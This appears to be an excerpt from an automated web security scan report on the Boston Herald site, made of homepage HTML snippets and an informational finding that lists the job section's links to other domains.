<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers’ LaMarcus Aldridge during last night’s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in ‘The Mechanic,’ a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/television/general/view.bg?articleid=1312267&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/ed4fba_tyler_01272011.jpg" border="0"
width="207" height="181" caption="Talent show gives Steven Tyler collectibles a big boost" /></a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312555&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg" border="0"
width="207" height="181" caption="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." /></a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>
<a class="orange" href="http://www.homefind.com">Search Homes</a>  |  
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>  |  
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker’s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.273. http://www.bostonherald.com/jobfind/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/jobfind/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif
http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif
http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif
http://bh.heraldinteractive.com/jobfind/resume_edge/
http://bostonherald.boocoo.com/
http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif
http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif
http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/jobfind/
http://feeds.feedburner.com/bostonherald/jobfind/news/
http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB
http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald
http://hotjobs.yahoo.com/
http://hotjobs.yahoo.com/create-resume
http://hotjobs.yahoo.com/diversity
http://hotjobs.yahoo.com/interview
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA
http://hotjobs.yahoo.com/jobs-search-advanced/
http://hotjobs.yahoo.com/jobs-search-category
http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald
http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald
http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime
http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald
http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald
http://hotjobs.yahoo.com/networking
http://hotjobs.yahoo.com/resume
http://hotjobs.yahoo.com/salary
http://jobfind.salary.com/
http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp
http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp
http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp
http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp
http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp
http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp
http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif
http://l.yimg.com/a/i/us/hj/post_resume.gif
http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald
http://twitter.com/bostonherald
http://us.bc.yahoo.com/b?P=CO_vyULEenJcz9lH2_GkPAdIzIkMMk1DgrsADsRj&T=17ul1btni%2fX%3d1296270011%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d2975542127%2fH%3dc2VydmVJZD0iQ09fdnlVTEVlbkpjejlsSDJfR2tQQWRJeklrTU1rMURncnNBRHNSaiIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI5NjI3MDAxMTk3NDMwNyIg%2fQ%3d-1%2fS%3d1%2fJ%3d1F7AC442
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/
